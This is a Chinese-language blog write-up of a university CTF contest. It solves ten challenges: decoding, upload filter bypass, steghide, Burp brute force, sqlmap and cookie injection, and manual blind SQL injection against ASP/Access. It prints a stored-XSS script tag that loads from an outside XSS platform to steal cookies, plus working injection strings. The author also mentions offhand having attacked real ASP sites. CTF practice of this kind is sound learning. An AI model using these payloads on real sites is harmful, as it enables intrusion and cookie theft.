0×00
最近有一些考试 blog都没更T T 计算机网络考试前一天 还在做题 真是no zuo no die的典范 不过今天计算机网络还是比较简单的 应该能过 比赛是四川理工的第一届比赛 http://isc.suse.edu.cn/ 10关 最后通关了 第二名 网站没开 之后再附上一些题目的截图
0×01 js
第一题 是个源代码的问题,比较简单 发现没法右键 查看不了源码 这里可能就会有一点问题 禁用右键可以用js实现 所以禁用js一般可以 不行的话就把页面另存为 自己本地看看 在文件里有js 里面又一段10进制的好像编码过的
t="75,101,121,58,87,101,108,99,111,109,101,95,84,111,95,73,83,67,95,115,117,115,101,95,54,54,54,54,54,54"
直接解码就是key 简单
Key:Welcome_To_ISC_suse_666666
0×02 加解密
一段 htmlencode的东西#x44; 一大串这样子的
把这段htmldecode 或者是直接保存到html文件中 浏览器打开 就可以看到
OGZmM2I5ZmJhYWQzNDg2MGQwYmMyYTc0NDhhODdhN2I=
看字符范围 是大小写数字 最后还有= 位数还是4的倍数 base64解密一下
8ff3b9fbaad34860d0bc2a7448a87a7b
小写加数字 32位 cmd5解一下md5
youcanfindme
0×03 http
题目是要算个5-6位的乘法和加法 有三个数吧
本来一开始想正常编程做的 都太懒了 就放着 后来发现了时间的限制是8秒 就淫荡了起来
直接开谷歌 用谷歌算 计算机去也是可以了 然后用单身20年的手速去粘贴回去提交 7秒 哈哈 就得到了key
后来大家交流的时候 还发现可以直接改包修改时间
Key:Hello!*ISC++
0×04 upload
有个突破上传的
这个题多试几次 要求上传php文件的 才会给key 有限制的只能上传gif的
然后就去研究一下源代码,发现那个检查gif是用了js来检查 然后就很简单了
用浏览器插件firebug去调试js 直接改gif为php chrome和firebug下面都有
然后再上传一个php的文件上去
回显
你以为我那么好骗的吗? 说了要上传gif图片的!!!
上传: Load.php 成功!!!
然后就根据这个提示 去找个gif的文件 改成php的再上传一次 估计是检验了文件幻数
回显
You Are Very GOOG!!
KEY: File_UPload!is+very-Simple!!
0×05 隐写术
题目给了个mp3 还有一个提示 information hide, steghide
然后就是听听mp3吧 在mp3的最后给了一个密码
1314528
根据提示 去找了一下steghide 是个隐写的工具 有下载的链接
http://sourceforge.net/projects/steghide/files/stats/timeline
下载一发
运行一下 得到了key
key: Hello_StegHide_iS_interesting
0×06 brute
爆破题 技术难度是没什么 不过做题平台居然有安全狗 无力吐槽啊 一直被咬死
给出了字典 user pass 要你去登陆 一个爆破的问题 用burp就可以了
数量是94*82=7708
设置一下intruder 变量改改 选择cluster bomb 可以同时使用两个不同的变量
然后再去载入他给的字典
设置好线程和时间间隔 因为有狗在所以别设置太快
pablo letmein
然后登陆就看到key了
key:!!Force_Crack!_IS_This*24835
0×07 XSS
一开始看到xss 是个留言板的xss 然后就是没有回显 提示过滤了alert啊 什么的 估计是要用xss平台去xss到cookie
然后就没做 先去做了后面的sql注入 发现了 因为是本站 所以sql注入可以注入到留言板的数据库guestbook 然后通过guestbook可以看到别人注入的语句 我看到前面有人做出来了 其实自己做也不难
参考了jim叔叔的语句
也看到jim叔叔试了几次 才成功 好刺激
<script src="http://lennyxss.sinaapp.com/3C9ee4?1399828748" >hehe</script>
这个就是能成功的语句
然后去就登陆xss平台看看
发现了cookie里有key urldecode解密提交一下就可以
因为第一个注入可以看到guestbook 最后还发现有人有用他们学校的服务器接受cookie 吓尿了
key=XSS_Store_Is_*Very*_Simply
0×08 sqli
这个注入 是get型的mysql注入 因为有狗 sqlmap也不太好用了
晚上没人的时候 丢给sqlmap 还学习了新的sqlmap技巧 –delay=1 设置延迟时间为1秒
–dbs
–table
发现了guestbook 还有一些Users表 Users2 Users3 Users4 Users5
最后在User5发现看This_key
-T Users5 -C This_key –dump
key:MySQL_Inject_You_Are_Success
0×09 cookie注入
以前就见过的老题目 大一的时候做不出来 现在会了 零魂学长出的题目 比较古老了
是个cookie注入 比较纠结 中转出来吧
cookie中转成get 好跑sqlmap
我没中转然后丢给sqlmap 不晓得为什么不可以 –level 2 什么的 检测一下cookie
中转后 就是正常的注入 就是asp+access的列名不好猜 猜到了admin 还有一个存了密码的 psw
然后就去跑
admin
jiubugaosuni666
网站有个后台 去登陆一下
发现提示要自己找到后台 扫一发
/manage/ 目录 然后发现目录跳转了
跳转到了首页 提示说要来自 四川理工学院
加上一条referer
Referer: http://www.isc.suse.edu.cn/
还有referer 一般在后台是用正则匹配的 所以http://www.isc.suse.edu.cn不行 http://www.isc.suse.edu.cn/才可以 一开始没试出来 有点坑 正则没写好
然后就跳到了真正的后台
http://yutaiyuan.f3322.org/9/admin_main5418.asp
登陆一发
在后台找到了这样子的信息
MjY1NzIwNjBkMWZmNjk4MTgxMWIwNzlkMDQxMmQ2Y2Q=
base64解密
26572060d1ff6981811b079d0412d6cd
解一下md5 就是key了
youareverygood
0x0A blind sqli
盲注的题目 有点纠结 观察一下是asp 提交后的页面title还说是search 明显是asp的搜索型注入
然后就去注入
news是注入点
一开始没构造对 多了一个’ 还好音符牛带我飞 他会补上一个’ 我之前观察到了这个 以为会补在字符串后面 后来才知道是wenzhang后一位
这个是错误的 news=wenzhang’%’ and 1=1 and ‘%’=&searchs=%CB%D1++%CB%F7
正确的姿势
wenzhang%' and 1=1 and '%'=' wenzhang%' and 1=2 and '%'='
看看页面有注释提示 说key的管理员表中
manager
wenzhang%' and (select count(*) from manager)>0 and '%'=' wenzhang%' and (select top 1 len(id)from manager)>0 and '%'='
只知道个id的列
猜列名比较难 还去想偏移注入 发现都没回显 可以写脚本跑跑
wenzhang%' and (select top 1 len(admin_psw)from manager)>6 and '%'=' wenzhang%' and (select top 1 len(admin_psw)from manager)>7 and '%'='
发现了admin_psw的列名 长度为7 手工注入一次
wenzhang%' and (select top 1 asc(mid(admin_psw,1,1))from manager)>47 and '%'='
结果是
48 73 53 79 56 75 33
解一下ascii码
0I5O8K!
0x0B 后记
考试前做题 真是作死
网站有狗不科学啊 sqlmap burp 神器用得不爽
不过也学会了特殊的延时技巧
还有一些asp+access的特性 之前也日了一些asp的站 涨姿势
FROM :appleu0.sinaapp.com | Author:appleu0
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论